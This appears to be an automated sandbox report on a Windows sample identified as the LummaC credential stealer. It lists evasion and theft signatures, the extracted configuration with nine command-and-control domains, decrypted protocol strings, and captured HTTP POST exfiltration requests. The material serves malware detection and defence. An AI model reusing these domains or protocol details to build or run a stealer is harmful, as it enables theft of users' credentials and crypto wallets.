Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1571961
MD5:	52f0f216dfbb86683b1e318a0796dd81
SHA1:	2e2b8710e0a077ed8a2124fde2486f397857b8f6
SHA256:	1d95373c2284b657b614f07051eed5fed72f34f787350409e49e8dc30a5ea494
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Detected potential crypto function

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 2876 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 52F0F216DFBB86683B1E318A0796DD81)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["impend-differ.biz", "dwell-exclaim.biz", "se-blurry.biz", "atten-supporse.biz", "dare-curbys.biz", "zinc-sneark.biz", "formy-spill.biz", "covery-mover.biz", "print-vexer.biz"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2183576461.000000000173F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2183284410.000000000173F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2155738862.0000000001745000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2184825039.000000000173F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2183365042.000000000173F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2183995653.000000000173F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2183909532.000000000173F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2184609958.000000000173F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2084573871.0000000001745000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2183070027.000000000173F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2184342033.000000000173F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2120532040.0000000001745000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2182875665.000000000173E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2184473776.000000000173F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2156261014.0000000001745000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2183708520.000000000173F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2184119723.000000000173F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2184213865.000000000173F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2183174320.000000000173F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2183492043.000000000173F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2184688562.000000000173E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2183790933.000000000173F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 2876	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: file.exe PID: 2876	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 2876	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 21 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T22:35:00.868997+0100	2028371	3	Unknown Traffic	192.168.2.5	49704	104.21.48.1	443	TCP
2024-12-09T22:35:03.184197+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	104.21.48.1	443	TCP
2024-12-09T22:35:06.084485+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	104.21.48.1	443	TCP
2024-12-09T22:35:09.573683+0100	2028371	3	Unknown Traffic	192.168.2.5	49707	104.21.48.1	443	TCP
2024-12-09T22:35:13.269460+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	104.21.48.1	443	TCP
2024-12-09T22:35:16.110444+0100	2028371	3	Unknown Traffic	192.168.2.5	49709	104.21.48.1	443	TCP
2024-12-09T22:35:18.974676+0100	2028371	3	Unknown Traffic	192.168.2.5	49713	104.21.48.1	443	TCP
2024-12-09T22:35:23.317538+0100	2028371	3	Unknown Traffic	192.168.2.5	49722	104.21.48.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T22:35:01.920542+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49704	104.21.48.1	443	TCP
2024-12-09T22:35:04.551032+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49705	104.21.48.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T22:35:01.920542+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49704	104.21.48.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T22:35:04.551032+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49705	104.21.48.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T22:35:00.868997+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49704	104.21.48.1	443	TCP
2024-12-09T22:35:03.184197+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49705	104.21.48.1	443	TCP
2024-12-09T22:35:06.084485+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49706	104.21.48.1	443	TCP
2024-12-09T22:35:09.573683+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49707	104.21.48.1	443	TCP
2024-12-09T22:35:13.269460+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49708	104.21.48.1	443	TCP
2024-12-09T22:35:16.110444+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49709	104.21.48.1	443	TCP
2024-12-09T22:35:18.974676+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49713	104.21.48.1	443	TCP
2024-12-09T22:35:23.317538+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49722	104.21.48.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T22:34:59.339141+0100	2057921	1	Domain Observed Used for C2 Detected	192.168.2.5	64160	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T22:35:08.226993+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49706	104.21.48.1	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T22:35:18.986057+0100	2843864	1	A Network Trojan was detected	192.168.2.5	49713	104.21.48.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://atten-supporse.biz:443/api://%ProgramFiles%	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/744-1-2	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/api1	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz:443/apiUU2	Avira URL Cloud: Label: malware

Found malware configuration

Source: file.exe.2876.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["impend-differ.biz", "dwell-exclaim.biz", "se-blurry.biz", "atten-supporse.biz", "dare-curbys.biz", "zinc-sneark.biz", "formy-spill.biz", "covery-mover.biz", "print-vexer.biz"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp	String decryptor: impend-differ.biz
Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp	String decryptor: print-vexer.biz
Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp	String decryptor: dare-curbys.biz
Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp	String decryptor: covery-mover.biz
Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp	String decryptor: formy-spill.biz
Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp	String decryptor: dwell-exclaim.biz
Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp	String decryptor: zinc-sneark.biz
Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp	String decryptor: se-blurry.biz
Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp	String decryptor: atten-supporse.biz
Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp	String decryptor: LOGS11--LiveTraffic

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00C66B7E CryptUnprotectData,

0_2_00C66B7E

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49713 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h]	0_2_00C76170
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then push eax	0_2_00C5C36E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h]	0_2_00C7C6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00C7C6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]	0_2_00C7C6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]	0_2_00C7C6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh	0_2_00C8E690
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+05h]	0_2_00C5A960
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edx], bl	0_2_00C5CE55
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_00C8DBD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	0_2_00C59CC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh	0_2_00C8DCF0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00C67E82
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]	0_2_00C7BFD3
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]	0_2_00C7BFDA
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]	0_2_00C75F7D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00C7A060
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi+ebx], 00000000h	0_2_00C5C274
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, eax	0_2_00C72270
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00C845F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp al, 2Eh	0_2_00C766E7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00C786F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_00C7A630
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00C70717
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_00C70717
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00C786F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00C8CAC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_00C7AAD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi]	0_2_00C52B70
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]	0_2_00C86B20
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00C8CCE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00C8CD60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	0_2_00C66E97
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, eax	0_2_00C66E97
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h	0_2_00C6CEA5
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00C8CE00
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add ebx, 03h	0_2_00C78F5D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h	0_2_00C64F08
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, edx	0_2_00C64F08
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	0_2_00C6D087
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_00C7D085
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_00C7D085
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	0_2_00C6D074
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	0_2_00C67190
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]	0_2_00C792D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ebx	0_2_00C792D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [00C94284h]	0_2_00C75230
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_00C7B3DE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_00C7B3DE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, bx	0_2_00C7536C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_00C77307
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00C7B4BB
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00C7B475
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00C57470
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00C57470
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-41h]	0_2_00C796D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch]	0_2_00C77653
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	0_2_00C6597D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	0_2_00C66E97
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, eax	0_2_00C66E97
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, eax	0_2_00C55910
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebp, eax	0_2_00C55910
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	0_2_00C75920
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_00C65ADC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	0_2_00C69C10
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh]	0_2_00C65EE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00C71EE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h	0_2_00C8DFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]	0_2_00C75F7D

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.5:64160 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49704 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49705 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49706 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49707 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49708 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49713 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49709 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49722 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49706 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49713 -> 104.21.48.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: impend-differ.biz
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	URLs: se-blurry.biz
Source: Malware configuration extractor	URLs: atten-supporse.biz
Source: Malware configuration extractor	URLs: dare-curbys.biz
Source: Malware configuration extractor	URLs: zinc-sneark.biz
Source: Malware configuration extractor	URLs: formy-spill.biz
Source: Malware configuration extractor	URLs: covery-mover.biz
Source: Malware configuration extractor	URLs: print-vexer.biz

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 104.21.48.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NRG4EX5TSVGAGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12811Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=S3VQX4XMY4AUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15047Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8H6WZ2K2HQ3C0EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20549Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GRNSLLOILUIEJ2IWEALUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1262Host: atten-supporse.biz
